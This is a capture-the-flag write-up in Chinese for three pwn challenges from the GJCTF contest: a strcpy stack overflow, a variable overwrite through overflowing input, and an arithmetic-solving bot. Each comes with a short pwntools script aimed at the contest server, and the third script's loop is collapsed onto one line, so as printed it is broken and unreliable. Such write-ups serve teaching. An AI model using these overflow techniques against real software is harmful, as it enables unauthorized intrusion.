GJCTF 官方WP PWN部分

1、题目链接:http://www.czlgjbbq.top/GJCTF/pwn_stack

连接方式:nc 188.131.185.193 50000
逆向分析:使用IDA32打开。

定位MAIN函数,F5看源码。很容易发现存在危险函数strcpy,并存在溢出漏洞。v5在这里是ID,v4在这里是name,程序我们需要通过覆盖name来让ID为1000,从而拿到执行系统命令拿到FLAG值。

PYTHON脚本:

#!/usr/bin/env python
#coding=utf-8
from pwn import *
s = remote("188.131.185.193",50000)
s.recvline()
s.recvline()
s.sendline("USER user:)")
s.sendline("PASS pass:)")
s.recvline()
s.sendline("1234")
s.recvline()
s.sendline("aaaaaaaa1000")
s.interactive()
运行结果:

2、题目链接:http://www.czlgjbbq.top/GJCT/int_overflow

连接方式:nc 188.131.185.193 50001
IDA32打开。锁定main函数,F5看主函数。

发现是整数溢出漏洞。对十进制数1633837924转换成16进制进行分析。

由于在linux中,栈是由栈底向栈顶增长,所以这里我们将0x64626364转换成ASCII码后再转换成字符型,(先进后出,就是dcba)
第一位会被存在变量V4中。V4先进栈,V5后进栈。V4无法接受时,向栈顶增长,则会覆盖V5的地址中的内容。
这里直接给出python脚本。

#!/usr/bin/env python
from pwn import *
s = remote("188.131.185.193",50001)
s.recvline()
s.recvline()
s.sendline('adcba')
s.interactive()
运行结果:

3、连接方式:nc 188.131.185.193 50002

本题可以先使用NC连接一下。发现有做不完的数学题==
这个时候我们可以写个python脚本来代替我们人工计算,从而拿到flag。本题整体而言比较简单。只是写写脚本,完全没有达到CTF的难度好不好!@#……%¥#@!

下面给出python脚本:

#!/usr/bin/env python
#coding=utf-8
from pwn import *
s = remote("188.131.185.193",50002)
count = 0
while True:try:print s.recvline()s.recvline()expression = s.recvline().replace("\n","")s.recvuntil("Please input your Answer:")result = eval(expression)s.sendline(str(result))count = count + 1print "time:"+str(count)except:break
运行结果:

GJCTF 官方WP PWN部分相关推荐

  1. decode判断不为空拼接_空指针4月内部赛官方WP

    本次内部赛含WEB跟RE题目各一道,其中RE题目7人解出,WEB题目1人解出,恭喜以上选手. 下面放上本次内部赛的WP. RE题目由于前几次的空指针题目太难了,所以这次出了一道较为简单的题(要不然每次 ...

  2. 2021天翼杯 密码官方wp

    2021天翼杯 crypto TryHash 审计题目代码,题目给出了一个feistel结构的加密算法,密钥长度为8字节.用随机生成的密钥对flag进行了加密.攻击者可以提供一段明文让服务器用同样的密 ...

  3. CDUT新生赛wp pwn web

    一起讲了得了 贝壳是什么东西 kali中终端运行 nc ctf.dino209.cn 8001 然后直接拿到flag EZのStack_Overflow 栈溢出的题 ida打开 双击第四行函数 可以看 ...

  4. 2019UNCTF-竞技赛 部分WP

    2019UNCTF-竞技赛 部分WP emmmm,比赛结束了,,,, 无奈本人太菜,只能做几个题,,,, flag部分白嫖,部分靠混,,,, web checkin 直接白嫖~~,nodejs注入,而 ...

  5. CTFshow 击剑杯 部分WP

    摆烂了摆烂了 太难了 聪明的师傅已经组队打起月赛了 试试能不能苟住前5 苟住了 复现的后面再补充吧 文章目录 1.Misc 中文识别带师 2.Web 简单的验证码 easyPOP 3.Pwn pwn0 ...

  6. 第五届百越杯线上赛部分WP

    Web BabyPHP 一访问容器就给了PHP代码 <?php error_reporting(1); class Read {private $var;public function file ...

  7. 2019 moeCTF新生题 部分wp

    author: xiaohuihui status: 初步完成,带×的题目尚未解出,已经出官方wp 官方wp: https://github.com/XDSEC/moeCTF_2019 说明1:题目附 ...

  8. ctfshow-新手杯-crypto4新手村难度-wp

    ctfshow-新手杯 先贴一贴官方wp 国庆放假摆得太厉害,忘记了还有比赛,放完后赶紧回来补一补 crypto4 新手村难度 贴贴题目 from Crypto.Util.number import ...

  9. CTF Web题 部分WP

    1.web2 听说聪明的人都能找到答案 http://123.206.87.240:8002/web2/ CTRL + u 查看源代码 2.计算器 http://123.206.87.240:8002 ...

最新文章

  1. 正则 不区分大小写_为什么要学正则表达式 7
  2. 120种小狗图像傻傻分不清?用fastai训练一个分类器
  3. 女儿社交媒体求生日卡 美96岁失明二战老兵收海量祝福
  4. php lang无效,详解 Go 中的不可变类型
  5. python3 乱序函数 shuffle 简介
  6. 多个DIV排列时居中
  7. Flex 按钮添加图标
  8. onmousemove和onmouseout事件的调用,和js使用双引号、单引号的时候应该注意的问题...
  9. hadoop主节点切换_hadoop2.0 HA的主备自动切换
  10. 3个平台下的ffmpeg——ffmpeg编译
  11. 使用FlexBox和Json实现类似ComboBox(类似Google的输入提示和自动)功能-基于JQuery-ASP.NET...
  12. 无重复字符最长字串的滑动窗口结合哈希表解法(注释详尽)
  13. msm8953抓取audio kernel dsp log
  14. 配置一个强大的FireFox
  15. 用JMS578转接板开卡PS3111主控pSLC模式,带固件下载
  16. android studio闹钟小程序,闹钟应用程序Android Studio
  17. 黑客的滑铁卢——美国大断网全纪实
  18. latex里图片大小如何调整_如何使Latex中的图片放大依然清晰
  19. PDF文件如何在线翻译成中文
  20. 看一遍都懂的数组遍历~确定不试试?

热门文章

  1. M域、B域、O域分别指什么?
  2. 保护眼睛(改变窗口颜色和Pdf背景颜色)xp和WIN7方法
  3. dry的原理_Dry Etch 工艺基本原理及良率剖析(经典讲解)
  4. 2021信息安全工程师学习笔记(四)
  5. 热门股权转让项目:临沂泰森置业发展有限公司70%股权转让
  6. 计算机经常无法打印机,为什么我电脑连接打印机老是出现这种情况~重启也不行...
  7. qq邮箱android版官方,QQ邮箱下载_腾讯QQ邮箱客户端下载【安卓版】-太平洋下载中心...
  8. Microsoft Edge打开主页就是2345界面
  9. 俩人同样写代码,我拿七千他咋五万八...
  10. mysql 两个字段相乘_触发将来自不同表的两列与mysql中的函数相乘